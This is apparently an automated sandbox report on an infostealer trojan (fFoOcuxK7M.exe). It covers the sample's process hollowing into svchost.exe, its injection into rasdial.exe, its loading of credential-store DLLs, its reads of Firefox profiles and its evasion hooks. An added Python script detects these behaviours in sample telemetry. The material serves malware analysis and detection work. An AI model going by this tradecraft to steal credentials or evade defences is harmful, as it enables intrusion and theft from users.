                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FFCF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: String function: 000E8900 appears 42 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: String function: 000C7DE1 appears 35 times
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: String function: 000E0AE3 appears 70 times
                Source: fFoOcuxK7M.exe, 00000000.00000003.2161136034.0000000003FBD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs fFoOcuxK7M.exe
                Source: fFoOcuxK7M.exe, 00000000.00000003.2159730557.0000000003DC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs fFoOcuxK7M.exe
                Source: fFoOcuxK7M.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@7/5
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012A06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_001181CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_001187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0013EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_0012C397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe File created: C:\Users\user\AppData\Local\Temp\autD414.tmp
                Source: fFoOcuxK7M.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002BF1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2633129582.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2633282489.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2635351754.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fFoOcuxK7M.exe Virustotal: Detection: 60%
                Source: fFoOcuxK7M.exe ReversingLabs: Detection: 78%
                Source: unknown Process created: C:\Users\user\Desktop\fFoOcuxK7M.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
                Source: C:\Windows\SysWOW64\rasdial.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\rasdial.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
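The process tree and "Section loaded" rows above carry three signals a detection engineer would turn into rules: svchost.exe is launched with the dropper's own path as its command line (the image on disk and the executable named in the command line disagree, a classic sign of process replacement), svchost.exe has a parent other than services.exe, and rasdial.exe, a RAS dialer, goes on to load winsqlite3.dll, vaultcli.dll and dpapi.dll and to spawn firefox.exe. The following is an added example of those rules run over constructed Sysmon-style events; it is not Joe Sandbox code, the field names (Image, CommandLine, ParentImage, ImageLoaded) are assumed, and the benign svchost.exe row at the end is constructed to show the rules stay quiet on normal lineage.

```python
"""Lineage and image-load checks over constructed endpoint telemetry.

Added example for this report, not Joe Sandbox code. Event shapes are
Sysmon-like (assumed field names); the rows are constructed from the
process tree and "Section loaded" lines of the report.
"""
import ntpath

# Credential-store DLLs the report shows rasdial.exe loading.
CREDENTIAL_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# System binaries this sample uses as host processes for injected code.
ABUSED_HOSTS = {"rasdial.exe", "svchost.exe"}
# Processes with no legitimate reason to open browser or vault credential stores.
NO_CREDENTIAL_ACCESS = {"rasdial.exe"}


def exe_from_cmdline(cmdline: str) -> str:
    """Lower-case basename of the executable token of a Windows command line.

    Handles the quoted form the report shows ("C:\\...\\x.exe") and the
    unquoted form with arguments (C:\\...\\svchost.exe -k netsvcs).
    """
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        token = s[1:end] if end != -1 else s[1:]
    else:
        token = s.split(" ", 1)[0]
    return ntpath.basename(token).lower()


def check_process_create(image: str, cmdline: str, parent_image: str) -> list[str]:
    """Rules applied to one process-creation event."""
    img = ntpath.basename(image).lower()
    parent = ntpath.basename(parent_image).lower()
    claimed = exe_from_cmdline(cmdline)
    findings = []
    # 1. Image on disk differs from the executable named in the command line.
    if claimed != img:
        findings.append(f"{img}: command line names {claimed} (process replacement indicator)")
    # 2. svchost.exe is normally started by services.exe only.
    if img == "svchost.exe" and parent != "services.exe":
        findings.append(f"svchost.exe started by {parent}, not services.exe")
    # 3. A RAS dialer or service host has no business launching a browser.
    if parent in ABUSED_HOSTS and img in BROWSERS:
        findings.append(f"{parent} launched browser {img}")
    return findings


def check_image_load(image: str, loaded: str) -> list[str]:
    """Rule applied to one image-load event."""
    img = ntpath.basename(image).lower()
    dll = ntpath.basename(loaded).lower()
    if img in NO_CREDENTIAL_ACCESS and dll in CREDENTIAL_DLLS:
        return [f"{img} loaded credential-store DLL {dll}"]
    return []


def analyze(events: list[dict]) -> list[str]:
    """Run every event through the rule for its type and collect findings."""
    findings = []
    for e in events:
        if e["type"] == "ProcessCreate":
            findings += check_process_create(e["Image"], e["CommandLine"], e["ParentImage"])
        elif e["type"] == "ImageLoad":
            findings += check_image_load(e["Image"], e["ImageLoaded"])
    return findings


DROPPER = r"C:\Users\user\Desktop\fFoOcuxK7M.exe"
PERSIST = (r"C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE"
           r"\TrOCMVbhcDRPP.exe")
RASDIAL = r"C:\Windows\SysWOW64\rasdial.exe"

# Constructed telemetry mirroring the report's process tree and DLL loads,
# plus one benign svchost.exe row (parent and command line both constructed).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "Image": DROPPER, "CommandLine": f'"{DROPPER}"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"type": "ProcessCreate", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": f'"{DROPPER}"', "ParentImage": DROPPER},
    {"type": "ProcessCreate", "Image": RASDIAL, "CommandLine": f'"{RASDIAL}"', "ParentImage": PERSIST},
    {"type": "ProcessCreate", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "ParentImage": RASDIAL},
    {"type": "ImageLoad", "Image": RASDIAL, "ImageLoaded": r"C:\Windows\SysWOW64\rasapi32.dll"},
    {"type": "ImageLoad", "Image": RASDIAL, "ImageLoaded": r"C:\Windows\SysWOW64\winsqlite3.dll"},
    {"type": "ImageLoad", "Image": RASDIAL, "ImageLoaded": r"C:\Windows\SysWOW64\vaultcli.dll"},
    {"type": "ImageLoad", "Image": RASDIAL, "ImageLoaded": r"C:\Windows\SysWOW64\dpapi.dll"},
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS):
        print(line)
```

The rules are deliberately narrow (exact parent for svchost.exe, a fixed DLL set for rasdial.exe) so they can be run against real Sysmon event ID 1 and 7 data without a flood of hits; widening NO_CREDENTIAL_ACCESS to every binary in System32 is where tuning against a baseline starts.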
                Source: fFoOcuxK7M.exe Static file information: File size 1227776 > 1048576
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: fFoOcuxK7M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrOCMVbhcDRPP.exe, 00000006.00000002.3381600573.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2521933157.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: fFoOcuxK7M.exe, 00000000.00000003.2160188894.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, fFoOcuxK7M.exe, 00000000.00000003.2159892716.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2363585255.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2455649386.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362029403.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2457562839.0000000004718000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2455394804.0000000004565000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3385957166.00000000048C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2455363254.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424289874.000000000301A000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000002.3385029170.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: fFoOcuxK7M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: fFoOcuxK7M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: fFoOcuxK7M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: fFoOcuxK7M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: fFoOcuxK7M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C4B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000CC4C6 push A3000CBAh; retn 000Ch 0_2_000CC50D
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000E8945 push ecx; ret 0_2_000E8958
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_014CC99F push ss; retn 0019h 0_2_014CC9DC
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_014CC8A5 push ds; retf 0019h 0_2_014CC99C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403100 push eax; ret 2_2_00403102
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E9B7 push esp; ret 2_2_0041E9BF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D307 push edx; ret 2_2_0040D30E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417333 push ecx; retf 2_2_00417336
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411C05 push esi; iretd 2_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411C13 push esi; iretd 2_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00427C33 push eax; iretd 2_2_00427CA9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00425553 push ds; iretd 2_2_00425554
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D53D push esi; retf 2_2_0040D53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004045F9 push ds; ret 2_2_004045FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418605 push ebp; retf 2_2_00418633
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413FD3 push 8BA57A45h; iretd 2_2_00413FEA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_00145376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Code function: 0_2_000E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe API/Special instruction interceptor: Address: 14CFC44
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\rasdial.exe API/Special instruction interceptor: Address: 7FFDB442DA44
